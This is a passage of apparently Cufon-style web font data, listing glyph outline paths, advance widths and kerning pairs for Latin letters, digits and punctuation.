98,0r0,59r-68,0r126,281r125,-281r-70,0r0,-59r197,0r0,61r-56,0r-179,379r-38,0","w":522,"k":{"*":-11,"@":22,"\/":15,"q":18,"p":9,".":56,",":56,"t":13,"z":9,"-":-11,"a":18,"c":18,"d":18,"e":18,"g":18,"h":9,"k":9,"l":9,"o":18,"s":12}},{"d":"171,-274v-68,0,-121,-54,-121,-121v0,-68,53,-122,121,-122v67,0,121,54,121,122v0,67,-54,121,-121,121xm475,-235v68,0,121,54,121,121v0,67,-53,122,-121,122v-67,0,-120,-55,-120,-122v0,-67,53,-121,120,-121xm130,22r-36,-31v21,-21,132,-155,210,-252r206,-256r37,30v-21,23,-133,159,-211,254v-78,95,-187,233,-206,255xm171,-323v38,0,66,-32,66,-72v0,-40,-28,-72,-66,-72v-38,0,-66,32,-66,72v0,40,28,72,66,72xm475,-185v-38,0,-65,32,-65,72v0,40,27,72,65,72v39,0,66,-32,66,-72v0,-40,-27,-72,-66,-72","w":646},{"d":"21,-528v0,-93,92,-142,190,-142v127,0,206,77,206,177v0,89,-67,167,-184,194r-10,117r-42,0r-16,-161v119,-23,178,-78,178,-148v0,-69,-50,-115,-133,-115v-53,1,-96,17,-114,52v48,12,36,91,-16,91v-30,0,-59,-26,-59,-65xm203,8v-32,0,-57,-26,-57,-58v0,-32,25,-59,57,-59v32,0,57,27,57,59v0,32,-25,58,-57,58","w":446},{"d":"101,-357r-32,-38r154,-147r154,147r-32,38r-122,-89","w":446},{"d":"290,-574r-6,69v71,9,132,43,132,93v0,29,-18,48,-43,48v-37,1,-58,-38,-41,-72v-9,-5,-31,-12,-56,-15r-12,162v79,25,157,58,157,147v0,97,-85,140,-180,142r-8,106r-55,-5r8,-104v-74,-10,-148,-43,-148,-104v0,-27,19,-48,45,-48v41,0,57,39,40,73v11,10,38,20,72,24r14,-178v-75,-23,-148,-53,-148,-137v0,-77,71,-130,168,-134r6,-71xm353,-139v0,-43,-39,-65,-96,-83r-14,167v60,-2,110,-28,110,-84xm129,-377v0,38,36,57,87,74r11,-150v-56,3,-98,29,-98,76"},{"d":"31,0r0,-60r68,0r0,-612r-68,0r0,-60r137,0r0,518r178,-154r-83,0r0,-58r241,0r0,61r-76,0r-134,115r132,190r78,0r0,60r-118,0r-142,-212r-76,64r0,89r69,0r0,59r-206,0","w":524,"k":{"q":9,"&":-11,"a":9,"c":9,"d":9,"e":9,"g":9,"o":9,"s":9}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r250,0r0,66r-91,0r0,527r228,0r0,-101r71,0r0,166r-458,0","w":554,"k":{"M":10,"Q":40,"V":60,"X":10,"*":52,"b":18,"}":21,"]":21,"p":9,")":21,"q":9,"?":42,"v":49,"j":18,"S":5,"T":60,"U":30,"W":50,"Y":60,"Z":10,"t":26,"u":26,"w":35,"y":18,"C":40,"G":40,"O":34,"-":31,"c":9,"d":9,"e":9,"g":9,"o":9}},{"d":"187,18r-117,-383r-63,0r0,-61r197,0r0,59r-68,0r77,269r119,-280r37,0r118,280r77,-269r-72,0r0,-59r197,0r0,61r-64,0r-116,383r-38,0r-123,-290r-124,290r-37,0","w":696,"k":{"*":-11,"p":4,"q":13,"\/":15,"&":11,"@":11,".":33,",":33,"z":4,"-":-11,"a":13,"c":13,"d":13,"e":4,"g":13,"h":4,"k":-4,"l":4,"o":4,"s":12}},{"d":"324,-533r-104,9r77,68v25,21,28,52,6,65v-62,35,-77,-79,-101,-120v-24,42,-38,155,-100,120v-22,-13,-19,-43,6,-65r77,-68v-57,-8,-163,3,-146,-60v7,-24,37,-30,64,-14r89,52r-24,-101v-7,-31,8,-56,34,-56v69,0,17,108,11,157r89,-52v27,-16,56,-10,64,14v8,25,-9,48,-42,51","w":405,"k":{"A":67}},{"d":"176,-104r0,-136r-134,0r0,-61r134,0r0,-136r63,0r0,136r135,0r0,61r-135,0r0,136r-63,0","w":416},{"d":"266,-503r-151,-86v-21,-13,-34,-30,-34,-44v2,-51,53,-51,83,-20r120,126","w":418},{"d":"337,176v-175,0,-292,-130,-292,-305v0,-267,196,-479,427,-479v178,0,291,117,291,287v0,158,-85,285,-194,285v-64,0,-94,-40,-92,-84v-29,51,-78,84,-132,84v-70,0,-123,-53,-123,-139v0,-116,85,-216,183,-216v60,0,96,37,108,82r22,-78r64,0r-56,224v-14,51,-1,79,36,79v76,0,138,-113,138,-237v0,-139,-93,-245,-245,-245v-209,0,-381,195,-381,438v0,146,98,262,247,262v57,0,111,-14,160,-40r19,36v-54,30,-116,46,-180,46xm370,-95v71,0,127,-75,127,-150v0,-54,-31,-85,-83,-85v-68,0,-120,71,-120,149v0,51,26,86,76,86","w":805,"k":{"5":10,"4":10,"3":10,"2":10,"1":20,"x":11,"X":31,"V":26,"A":10,"W":26,"Y":31,"Z":10,"z":22}},{"d":"40,0r0,-66r69,0r208,-271r-193,-255r-72,0r0,-66r229,0r0,64r-72,0r153,214r156,-214r-77,0r0,-64r229,0r0,66r-71,0r-194,254r207,272r69,0r0,66r-227,0r0,-64r73,0r-167,-231r-170,231r77,0r0,64r-227,0","w":721,"k":{"*":21,"v":35,"q":35,"p":13,"X":20,"V":35,"Q":45,"M":10,"J":20,"A":20,"S":24,"T":30,"U":20,"W":20,"Y":40,"Z":20,"t":26,"u":44,"w":26,"y":35,"C":45,"G":45,"O":42,"-":52,"a":18,"c":35,"d":35,"e":35,"g":32,"o":35,"s":26}},{"d":"103,8v-35,0,-61,-28,-61,-63v0,-35,26,-63,61,-63v35,0,61,28,61,63v0,35,-26,63,-61,63","w":206,"k":{"Q":42,"V":93,"v":56,"T":52,"U":42,"W":93,"Y":87,"t":6,"u":6,"w":33,"y":18,"C":42,"G":42,"O":42}},{"d":"20,0r0,-60r58,0r136,-156r-128,-149r-59,0r0,-61r186,0r0,57r-54,0r93,119r94,-119r-56,0r0,-57r185,0r0,61r-59,0r-127,147r137,158r57,0r0,60r-190,0r0,-56r59,0r-102,-129r-103,129r62,0r0,56r-189,0","w":503,"k":{"*":-11,"q":9,"a":9,"c":9,"d":9,"e":9,"g":9,"o":9,"s":9}},{"d":"251,8v-122,0,-207,-77,-207,-177v0,-72,51,-131,118,-156v-65,-28,-105,-90,-105,-142v0,-101,86,-172,194,-172v110,0,195,71,195,172v0,57,-42,114,-106,142v67,25,120,84,120,156v0,100,-86,177,-209,177xm251,-352v68,0,124,-50,124,-112v0,-65,-53,-114,-124,-114v-70,0,-122,49,-122,114v0,62,55,112,122,112xm251,-53v78,0,135,-52,135,-120v0,-70,-58,-122,-135,-122v-76,0,-134,52,-134,122v0,68,58,120,134,120","w":504,"k":{"}":10,"]":10,")":10,"9":10,"3":20}},{"d":"98,-79r-34,-48r204,-138r-204,-139r34,-48r251,170r0,33","w":389},{"d":"42,0r0,-66r86,0r24,-526r-88,0r0,-66r160,0r215,447r216,-447r159,0r0,66r-88,0r24,526r85,0r0,66r-242,0r0,-66r84,0r-17,-460r-212,433r-20,0r-212,-433r-16,460r83,0r0,66r-241,0","w":882,"k":{"v":26,"q":24,"p":13,"j":18,"X":10,"V":30,"Q":17,"M":10,"J":10,"A":10,"S":15,"T":26,"U":15,"W":30,"Y":25,"Z":10,"t":18,"w":26,"y":26,"z":18,"C":17,"G":17,"O":17,"-":10,"a":9,"c":18,"d":24,"e":18,"g":24,"o":18,"s":13}},{"d":"14,226r-36,-52v144,-89,244,-245,244,-434v0,-189,-100,-346,-244,-435r36,-52v159,92,281,273,281,487v0,214,-122,395,-281,486","w":364},{"d":"69,-420r-33,-179v-9,-43,14,-71,47,-71v34,0,56,27,48,71r-34,179r-28,0","w":168},{"d":"20,151r-19,-27v66,-50,89,-96,91,-123v-28,-5,-52,-30,-52,-60v0,-32,28,-58,60,-58v35,0,65,27,65,78v0,55,-37,132,-145,190","w":206,"k":{"Q":42,"V":93,"v":56,"T":52,"U":42,"W":93,"Y":87,"t":6,"u":6,"w":33,"y":18,"C":42,"G":42,"O":42}},{"d":"114,-553v-2,-113,41,-187,142,-187v46,0,78,22,78,57v0,28,-19,47,-43,47v-28,0,-44,-18,-52,-42v-80,17,-50,157,-56,252r110,0r0,61r-110,0r0,305r83,0r0,60r-221,0r0,-60r69,0r0,-305r-76,0r0,-61r76,0r0,-127","w":318,"k":{"*":-56,"}":-66,"]":-66,")":-66,"q":13,"?":-28,"\/":8,"&":-22,".":22,",":22,"c":13,"d":13,"e":13,"g":13,"o":13}},{"d":"277,8v-134,0,-230,-113,-230,-262v0,-151,95,-262,230,-262v134,0,231,112,231,262v0,150,-96,262,-231,262xm277,-53v95,0,158,-84,158,-201v0,-117,-63,-201,-158,-201v-94,0,-158,84,-158,201v0,117,64,201,158,201","w":554,"k":{"}":10,"]":10,")":10,"3":10}},{"d":"304,-640v72,1,150,33,155,104v5,73,-103,77,-102,10v0,-14,5,-24,13,-31v-16,-14,-40,-22,-72,-22v-89,0,-173,97,-178,276v27,-48,89,-86,161,-86v120,0,206,86,206,191v0,115,-89,207,-214,207v-150,0,-221,-115,-221,-277v0,-264,129,-372,252,-372xm128,-188v1,76,62,136,145,136v87,0,143,-62,143,-146v0,-74,-54,-131,-138,-131v-89,0,-150,67,-150,141","w":532,"k":{"}":10,"]":10,")":10,"7":10,"3":20}},{"d":"50,-326r0,-59r102,0r19,-123r63,0r-19,123r127,0r20,-123r63,0r-20,123r94,0r0,59r-103,0r-21,139r93,0r0,59r-102,0r-20,128r-63,0r19,-128r-127,0r-20,128r-62,0r19,-128r-93,0r0,-59r102,0r22,-139r-93,0xm204,-328r-22,142r131,0r22,-142r-131,0","w":519},{"d":"113,-258v-34,0,-61,-28,-61,-62v0,-34,27,-62,61,-62v34,0,61,28,61,62v0,34,-27,62,-61,62xm31,149r-19,-27v66,-49,89,-94,90,-121v-28,-5,-51,-30,-51,-59v0,-31,27,-57,59,-57v35,0,65,26,65,76v0,54,-37,131,-144,188","w":225},{"d":"229,-434v103,0,169,47,169,142r0,232r69,0r0,60r-133,0r0,-54v-35,34,-90,62,-148,62v-82,0,-141,-49,-141,-122v0,-78,69,-129,164,-129v46,0,101,12,123,20r0,-59v-1,-65,-43,-93,-112,-94v-34,0,-52,9,-66,18v16,31,-2,69,-39,69v-26,0,-44,-20,-44,-46v0,-49,56,-99,158,-99xm204,-48v51,0,95,-26,128,-59r0,-71v-32,-9,-74,-17,-115,-17v-129,0,-138,149,-13,147","w":492,"k":{"b":9,"p":9,"q":9,"?":22,"v":23,"x":9,"j":9,"u":9,"w":18,"y":23,"z":18,"-":11,"a":9,"c":9,"d":9,"e":9,"g":9,"h":9,"k":9,"l":9,"o":9,"s":9}},{"d":"23,200r0,-64r159,0r0,-804r-159,0r0,-64r229,0r0,932r-229,0","w":353},{"d":"163,-149v0,59,25,94,82,93v53,0,100,-34,140,-75r0,-234r-70,0r0,-61r139,0r0,366r68,0r0,60r-135,0r0,-79v-40,47,-98,87,-159,87v-91,0,-133,-54,-134,-144r0,-229r-68,0r0,-61r137,0r0,277","w":553,"k":{"b":9,"?":5,"x":9,"u":9,"z":13}},{"d":"191,0r0,-66r92,0r0,-197r-194,-329r-70,0r0,-66r221,0r0,66r-68,0r150,265r151,-265r-71,0r0,-66r222,0r0,66r-71,0r-195,328r0,198r93,0r0,66r-260,0","w":642,"k":{"J":65,"M":25,"Q":30,"X":40,"p":44,"q":70,"v":45,"m":44,"x":44,"\/":36,"j":9,"&":31,"@":42,"A":50,"S":30,"T":10,"U":15,".":73,",":73,"t":31,"u":44,"w":47,"y":44,"z":53,"C":30,"G":30,"O":30,":":42,";":42,"-":73,"a":68,"c":70,"d":70,"e":70,"f":26,"g":70,"i":18,"n":44,"o":70,"r":44,"s":68}},{"d":"33,0r0,-60r72,0r0,-612r-72,0r0,-60r141,0r0,672r72,0r0,60r-213,0","w":278,"k":{"b":9,"p":13,"v":4,"j":13,"u":13,"w":4,"y":4,"z":9,"a":9,"s":9}},{"d":"387,12v-192,0,-331,-150,-331,-340v0,-193,141,-342,335,-342v191,0,331,150,331,340v0,193,-142,342,-335,342xm389,-56v150,0,256,-118,256,-272v0,-155,-106,-274,-256,-274v-151,0,-257,118,-257,272v0,155,106,274,257,274","w":777,"k":{"J":5,"M":17,"V":30,"X":42,"b":4,"\\":31,"}":10,"]":10,")":10,"\/":6,"A":27,"S":20,"T":20,"W":38,"Y":30,"Z":13,".":42,",":42,"z":18,"a":9,"h":9,"k":9,"l":9}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r250,0v145,0,239,73,239,191v0,90,-58,153,-141,180r138,221r79,0r0,66r-130,0r-162,-269v-34,4,-83,1,-114,0r0,203r86,0r0,66r-245,0xm206,-334v124,14,255,-16,255,-131v0,-83,-66,-127,-168,-127r-87,0r0,258","w":618,"k":{"J":-14,"V":23,"X":5,"\\":21,"q":9,"?":10,"v":9,"j":-9,"T":30,"W":16,"Y":27,".":-21,",":-21,"w":4,":":-21,";":-21,"-":5,"c":9,"d":9,"e":9,"g":9,"o":9}},{"d":"292,-79r-251,-170r0,-33r251,-170r33,48r-204,139r204,138","w":389},{"d":"189,0r0,-66r89,0r0,-529r-165,0r0,106r-71,0r0,-169r547,0r0,169r-71,0r0,-106r-165,0r0,529r89,0r0,66r-253,0","w":631,"k":{"J":50,"M":26,"Q":20,"V":10,"X":30,"p":44,"q":66,"v":53,"m":44,"x":53,"\/":40,"j":9,"&":21,"@":31,"A":50,"S":20,"U":5,"W":10,"Y":10,".":52,",":52,"t":35,"u":53,"w":53,"y":53,"z":66,"C":20,"G":20,"O":20,":":42,";":42,"-":62,"a":62,"c":66,"d":66,"e":66,"f":35,"g":66,"i":9,"n":44,"o":66,"r":44,"s":66}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r253,0v138,0,243,80,243,207v0,135,-98,214,-244,214v-36,0,-74,-1,-93,-2r0,173r89,0r0,66r-248,0xm303,-302v102,0,165,-57,165,-148v0,-90,-73,-142,-167,-142r-95,0r0,288v20,1,55,2,97,2","w":581,"k":{"@":21,"\/":29,"?":-31,"q":18,"X":40,"M":25,"J":48,"A":50,"Y":20,".":52,",":52,"z":9,"a":22,"c":18,"d":18,"e":18,"g":18,"o":18,"s":18}},{"d":"37,0r0,-31r273,-338r-195,0r0,83r-61,0r0,-140r356,0r0,31r-273,338r216,0r0,-83r61,0r0,140r-377,0","w":450,"k":{"p":4,"q":9,"?":11,"v":9,"u":9,"w":4,"y":9,"z":9,"-":11,"a":9,"c":9,"d":9,"e":9,"g":9,"o":9,"s":4}},{"d":"441,-193r-328,0v9,158,205,171,314,93r-6,67v-44,27,-99,41,-153,41v-136,0,-227,-90,-227,-220v0,-118,79,-222,209,-222v140,0,211,111,191,241xm246,-375v-65,0,-122,46,-132,127r261,0v-5,-75,-48,-127,-129,-127","w":485,"k":{"\\":66,"}":11,"]":11,")":11,"?":11,"v":14,"x":9,"\/":9,".":11,",":11,"u":9,"w":7,"y":10,"z":9,"a":13}},{"d":"415,-223v2,141,-65,234,-199,235v-102,0,-186,-71,-186,-161v0,-46,26,-77,62,-77v53,0,72,87,15,97v3,30,41,72,109,72v88,0,125,-63,125,-167r0,-368r-101,0r0,-66r254,0r0,66r-79,0r0,369","w":529,"k":{"\/":20,"x":22,"v":22,"q":30,"p":26,"m":26,"X":20,"V":15,"M":15,"J":23,"A":37,"S":15,"T":5,"U":10,"W":15,"Y":15,"Z":10,".":42,",":42,"t":13,"u":26,"w":22,"y":22,"z":35,":":31,";":31,"a":27,"c":26,"d":30,"e":26,"f":26,"g":30,"i":18,"n":26,"o":26,"r":26,"s":27}},{"d":"263,-154v0,77,-128,148,-128,215v0,46,41,95,160,101r0,55v-152,-4,-229,-68,-229,-156v0,-56,30,-89,78,-136v26,-26,47,-49,47,-78v0,-54,-63,-85,-139,-80r0,-62v75,4,140,-26,139,-80v0,-29,-21,-52,-47,-78v-48,-47,-78,-80,-78,-136v0,-88,77,-152,229,-156r0,55v-119,6,-160,55,-160,101v0,66,128,139,128,215v0,42,-31,92,-117,110v86,18,117,68,117,110","w":347,"k":{"9":10,"8":10,"6":20,"5":10,"4":20,"3":5,"2":10,"0":10,"p":-33,"j":-94,"b":-44,"Q":10,"J":31,"A":10,"S":5,"y":-33,"C":10,"G":10,"O":10,"a":11,"c":11,"d":11,"e":11,"g":11,"h":-44,"k":-44,"l":-44,"o":11,"s":22}},{"d":"400,-276v1,-59,-24,-95,-82,-94v-53,0,-102,33,-140,75r0,235r67,0r0,60r-204,0r0,-60r68,0r0,-305r-68,0r0,-61r134,0r0,79v40,-47,99,-87,160,-87v91,0,133,55,134,144r0,230r68,0r0,60r-204,0r0,-60r67,0r0,-216","w":563,"k":{"b":9,"p":9,"q":9,"?":22,"v":23,"x":9,"j":9,"w":18,"y":13,"z":18,"a":9,"c":9,"d":9,"e":9,"g":9,"h":9,"k":9,"l":9,"o":9,"s":9}},{"d":"48,0r0,-66r89,0r0,-526r-89,0r0,-66r252,0r0,66r-89,0r0,526r89,0r0,66r-252,0","w":348,"k":{"b":-9,"p":9,"q":18,"z":18,"a":14,"c":18,"d":18,"e":18,"g":18,"o":18,"s":9}},{"d":"308,196r0,-60r85,0r0,-192v-36,36,-78,64,-146,64v-111,0,-203,-89,-203,-221v0,-122,88,-221,214,-221v54,0,103,21,140,53r21,-45r43,0r0,562r69,0r0,60r-223,0xm259,-53v55,0,99,-26,134,-62r0,-211v-33,-26,-75,-47,-131,-47v-82,0,-146,63,-146,160v0,96,61,160,143,160","w":531,"k":{"}":-66,"]":-66,")":-66,"\/":-66,"?":5}},{"d":"42,-314r0,-61r332,0r0,61r-332,0xm42,-153r0,-61r332,0r0,61r-332,0","w":416},{"d":"18,0r0,-66r63,0r197,-527r-75,0r0,-65r300,0r0,65r-75,0r197,527r63,0r0,66r-220,0r0,-65r77,0r-59,-162r-269,0r-59,162r80,0r0,65r-220,0xm239,-290r225,0r-112,-307","w":706},{"d":"184,-10v4,119,-48,210,-145,210v-58,0,-91,-31,-91,-65v0,-24,18,-47,45,-47v30,0,48,25,42,56v65,3,79,-74,80,-146r0,-363r-82,0r0,-61r151,0r0,416xm137,-535v-30,0,-55,-25,-55,-55v0,-30,26,-56,56,-56v29,0,54,26,54,56v0,30,-25,55,-55,55","w":259,"k":{"*":-11,"x":9,"y":9,"z":7,"-":-17}},{"d":"-6,148r0,-67r545,0r0,67r-545,0","w":533},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r245,0r0,65r-86,0r0,287r285,-287r-88,0r0,-65r254,0r0,66r-74,0r-214,213r210,313r83,0r0,66r-131,0r-217,-330r-108,108r0,156r86,0r0,66r-245,0","w":675,"k":{"Q":17,"V":50,"q":21,"v":35,"j":-9,"A":30,"S":10,"W":50,"Y":40,".":-21,",":-21,"t":13,"u":18,"w":26,"y":18,"C":22,"G":17,"O":17,":":-21,";":-21,"-":31,"a":9,"c":18,"d":21,"e":18,"g":21,"i":-27,"o":18}},{"d":"479,-8v80,34,160,121,254,50r34,60v-111,89,-249,-5,-325,-59v-29,-21,-63,-31,-99,-36v-166,-24,-287,-155,-287,-335v0,-193,141,-342,335,-342v191,0,331,150,331,340v0,163,-99,290,-243,322xm132,-330v0,152,104,274,257,274v150,0,256,-118,256,-272v0,-155,-106,-274,-256,-274v-151,0,-257,118,-257,272","w":777,"k":{"\\":31,"b":4,"V":30,"M":10,"W":32,"Y":30,"z":18,"a":7,"h":9,"k":9,"l":9}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r264,0v156,0,221,79,221,167v0,79,-49,132,-120,154v88,23,139,72,139,157v0,104,-83,180,-228,180r-276,0xm205,-65r120,0v97,0,152,-49,152,-119v0,-79,-65,-121,-173,-121r-99,0r0,240xm205,-366r97,0v104,0,156,-48,156,-118v0,-68,-52,-109,-149,-109r-104,0r0,227","w":605,"k":{"}":10,"]":10,")":10,"\\":21,"\/":5,"v":9,"p":9,"b":4,"X":20,"V":35,"A":20,"S":5,"T":20,"U":10,"W":30,"Y":30,"Z":15,".":10,",":10,"t":9,"u":9,"w":9,"y":9,"z":9}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r247,0v229,0,378,127,378,322v0,199,-139,336,-381,336r-244,0xm206,-66r94,0v197,0,296,-110,296,-271v0,-158,-118,-255,-304,-255r-86,0r0,526","w":728,"k":{"J":5,"M":24,"V":25,"X":50,"b":4,"\\":31,"}":10,"]":10,")":10,"\/":6,"A":27,"S":20,"T":20,"W":38,"Y":30,"Z":13,".":42,",":42,"z":18,"a":9,"h":18,"k":9,"l":9}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r471,0r0,161r-72,0r0,-96r-240,0r0,238r211,0r0,64r-211,0r0,225r91,0r0,66r-250,0","w":567,"k":{"@":31,"\/":68,"&":21,"x":57,"v":53,"q":74,"p":49,"m":49,"j":9,"X":20,"V":20,"Q":40,"M":25,"J":70,"A":70,"S":25,"T":30,"U":20,"W":20,"Y":10,"Z":20,".":73,",":73,"t":31,"u":57,"w":53,"y":53,"z":62,"C":40,"G":40,"O":40,":":52,";":52,"-":47,"a":75,"c":71,"d":74,"e":71,"f":44,"g":74,"h":9,"i":18,"k":9,"l":9,"n":49,"o":71,"r":49,"s":66}},{"d":"354,12v-150,0,-238,-85,-238,-239r0,-365r-83,0r0,-66r243,0r0,66r-87,0r0,360v0,117,61,176,166,176v105,0,167,-56,167,-174r0,-362r-87,0r0,-66r242,0r0,66r-83,0r0,362v0,156,-92,242,-240,242","w":710,"k":{"J":23,"M":15,"V":15,"X":20,"p":26,"q":30,"v":22,"m":26,"x":22,"\/":20,"A":37,"S":15,"T":5,"U":10,"W":15,"Y":15,"Z":10,".":42,",":42,"t":13,"w":22,"y":22,"z":35,":":31,";":31,"a":26,"c":26,"d":30,"e":26,"f":22,"g":30,"i":18,"n":26,"o":26,"r":26,"s":35}},{"d":"305,-434v79,0,83,107,16,107v-26,0,-44,-17,-51,-36v-32,9,-71,47,-92,90r0,213r80,0r0,60r-217,0r0,-60r68,0r0,-305r-68,0r0,-61r134,0r0,97v33,-59,84,-105,130,-105","w":380,"k":{"*":-22,"q":12,"\/":15,"&":-11,".":33,",":33,"-":-17,"a":5,"c":12,"d":12,"e":12,"g":12,"o":12,"s":3}},{"d":"284,10r-187,-602r-76,0r0,-66r238,0r0,66r-83,0r138,461r165,-448r41,0r166,447r134,-460r-86,0r0,-66r237,0r0,66r-76,0r-184,602r-43,0r-170,-453r-171,453r-43,0","w":990,"k":{"J":63,"M":30,"Q":32,"X":20,"p":53,"q":68,"v":43,"m":53,"x":43,"\/":53,"j":4,"&":21,"@":42,"A":55,"S":30,"T":10,"U":15,"Z":20,".":93,",":93,"t":30,"u":50,"w":43,"y":43,"z":52,"C":32,"G":32,"O":32,":":31,";":31,"-":52,"a":67,"c":75,"d":68,"e":75,"f":27,"g":68,"i":13,"n":53,"o":75,"r":53,"s":67}},{"d":"256,141v74,2,135,-41,132,-124r0,-83v-35,36,-77,63,-142,63v-111,0,-202,-88,-202,-212v0,-115,84,-219,211,-219v57,0,102,23,136,55r0,-47r135,0r0,61r-69,0r0,379v3,125,-84,189,-201,186v-91,-3,-167,-24,-167,-95v0,-29,21,-52,50,-52v36,0,54,43,33,71v13,8,41,17,84,17xm261,-373v-87,0,-145,68,-145,157v0,90,59,153,141,153v54,0,97,-26,131,-62r0,-200v-31,-27,-72,-48,-127,-48","w":556,"k":{"v":4,"x":18,".":47,",":47,"u":9,"w":4,"y":4,"z":18,"a":9,"d":9,"g":9,"s":13}},{"d":"581,-57v-203,157,-525,33,-525,-267v0,-208,159,-346,341,-346v148,0,247,82,247,152v0,37,-24,62,-56,62v-49,0,-71,-64,-37,-91v-25,-27,-82,-55,-156,-55v-156,0,-263,122,-263,278v0,162,116,270,252,270v75,0,138,-23,195,-63r0,-140r-182,0r0,-63r255,0r0,320r-71,0r0,-57","w":737,"k":{"V":20,"X":10,"p":9,"v":18,"T":20,"W":30,"Y":20,"Z":10,"t":4,"u":9,"w":18,"y":18,"z":9}},{"d":"163,-111v-3,77,94,59,137,29r-9,66v-22,12,-52,24,-91,24v-66,0,-105,-38,-105,-109r0,-264r-79,0r0,-61r79,0r0,-103r68,-27r0,130r131,0r0,61r-131,0r0,254","w":333,"k":{"q":3,"v":13,"&":-22,"y":13,"z":9,"c":3,"d":3,"e":3,"g":3,"k":13,"l":13,"o":3}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r478,0r0,161r-71,0r0,-96r-248,0r0,226r215,0r0,64r-215,0r0,238r248,0r0,-96r72,0r0,161r-479,0","w":588,"k":{"J":10,"Q":20,"V":10,"X":5,"p":18,"q":18,"v":26,"A":10,"S":15,"T":20,"U":10,"W":10,"Y":10,"Z":10,"t":18,"u":15,"w":26,"y":26,"z":9,"C":20,"G":20,"O":20,"-":31,"c":18,"d":18,"e":18,"g":18,"o":18,"s":9}},{"d":"393,12v-203,0,-337,-157,-337,-338v0,-203,156,-344,334,-344v138,0,246,83,246,162v0,37,-25,65,-58,65v-53,0,-74,-75,-30,-93v-18,-29,-75,-66,-159,-66v-150,0,-257,127,-257,275v0,141,106,271,261,271v79,0,145,-30,204,-85r44,53v-66,66,-157,100,-248,100","w":702,"k":{"J":10,"M":10,"Q":20,"V":20,"X":20,"p":18,"q":26,"v":18,"m":18,"x":9,"A":25,"S":15,"T":20,"U":10,"W":15,"Y":20,"Z":10,"t":18,"u":26,"w":18,"y":18,"z":18,"C":20,"G":20,"O":20,"-":21,"a":26,"c":26,"d":26,"e":26,"f":18,"g":26,"n":18,"o":26,"r":18,"s":18}},{"d":"393,-276v1,-62,-28,-94,-85,-94v-53,0,-102,33,-140,75r0,235r67,0r0,60r-204,0r0,-60r68,0r0,-612r-68,0r0,-60r137,0r0,383v41,-47,97,-85,158,-85v91,0,136,56,136,144r0,230r69,0r0,60r-205,0r0,-60r67,0r0,-216","w":556,"k":{"b":9,"p":9,"q":9,"?":22,"v":23,"x":9,"j":9,"w":18,"y":13,"z":18,"a":9,"c":9,"d":9,"e":9,"g":9,"o":9,"s":9}},{"d":"47,0r0,-66r84,0r0,-526r-84,0r0,-66r245,0r0,66r-86,0r0,222r364,0r0,-222r-86,0r0,-66r245,0r0,66r-84,0r0,526r84,0r0,66r-245,0r0,-66r86,0r0,-238r-364,0r0,238r86,0r0,66r-245,0","w":776,"k":{"b":-9,"p":9,"q":18,"z":18,"a":18,"c":18,"d":18,"e":18,"g":18,"o":18,"s":9}},{"d":"45,0r0,-36r403,-560r-314,0r0,104r-68,0r0,-166r488,0r0,36r-403,560r343,0r0,-104r67,0r0,166r-516,0","w":606,"k":{"J":10,"M":10,"Q":10,"V":20,"X":20,"*":15,"\\":10,"q":7,"v":18,"S":5,"T":20,"U":20,"W":10,"Y":20,"Z":10,"t":18,"u":9,"w":13,"y":18,"C":10,"G":13,"O":13,"-":21,"d":7,"g":7}},{"d":"234,126v-103,0,-199,-41,-199,-134v0,-33,24,-60,54,-60v48,-1,63,68,21,87v22,31,71,45,125,45v84,0,142,-50,142,-116v-1,-92,-99,-133,-208,-127r0,-59v100,6,201,-36,201,-119v0,-63,-53,-97,-128,-97v-58,1,-92,16,-111,42v44,18,27,86,-21,86v-28,0,-53,-24,-53,-60v0,-86,83,-130,189,-130v115,0,194,71,194,158v0,72,-71,137,-148,147v83,15,155,73,155,159v0,108,-93,178,-213,178","w":492,"k":{"}":10,"]":10,")":10}},{"d":"268,8v-129,0,-226,-94,-226,-220v0,-118,94,-222,213,-222v97,0,174,64,174,128v0,64,-98,83,-100,11v0,-14,8,-27,21,-35v-11,-26,-53,-45,-96,-45v-63,0,-141,55,-141,164v0,93,66,158,163,158v48,0,92,-15,142,-47r-6,67v-43,29,-98,41,-144,41","w":473,"k":{"p":9,"q":9,"?":11,"v":13,"x":4,"\/":9,"u":9,"y":9,"z":9,"a":9,"c":9,"d":9,"e":9,"g":9,"o":9,"s":3}},{"d":"327,10r-244,-602r-65,0r0,-66r222,0r0,66r-75,0r185,475r185,-475r-79,0r0,-66r222,0r0,66r-64,0r-244,602r-43,0","w":696,"k":{"@":42,"\/":50,"&":21,"x":44,"v":44,"q":68,"p":44,"m":44,"j":9,"X":35,"Q":30,"M":30,"J":65,"A":60,"S":20,"T":10,"U":15,"Z":20,".":93,",":93,"t":18,"u":44,"w":44,"y":44,"z":53,"C":30,"G":45,"O":30,":":42,";":42,"-":62,"a":70,"c":68,"d":68,"e":68,"f":26,"g":68,"i":18,"n":44,"o":68,"r":44,"s":72}},{"d":"606,3r-403,-531r0,462r86,0r0,66r-242,0r0,-66r84,0r0,-526r-84,0r0,-66r149,0r380,501r0,-435r-87,0r0,-66r239,0r0,66r-81,0r0,594","w":764,"k":{"J":20,"b":-9,"p":18,"q":17,"v":9,"m":18,"x":13,"&":21,".":31,",":31,"t":18,"u":18,"w":9,"y":9,"z":26,"a":26,"c":13,"d":17,"e":13,"f":18,"g":24,"i":9,"n":18,"o":13,"r":18,"s":26}},{"d":"140,-535v-30,0,-55,-25,-55,-55v0,-30,26,-56,56,-56v29,0,54,26,54,56v0,30,-26,55,-55,55xm43,0r0,-60r72,0r0,-305r-72,0r0,-61r141,0r0,366r72,0r0,60r-213,0","w":290,"k":{"b":9,"p":13,"v":18,"j":13,"u":13,"w":13,"y":18,"z":9,"a":9,"s":9}},{"w":227},{"d":"31,196r0,-60r68,0r0,-501r-68,0r0,-61r135,0r0,61v36,-40,79,-69,143,-69v112,0,201,88,201,219v0,120,-83,223,-210,223v-50,0,-97,-19,-132,-49r0,177r82,0r0,60r-219,0xm296,-53v83,0,141,-68,142,-161v1,-96,-59,-159,-139,-159v-55,0,-96,27,-131,63r0,210v32,27,73,47,128,47","w":555,"k":{"}":11,"]":11,")":11,"\/":23,"?":22,"x":9,"v"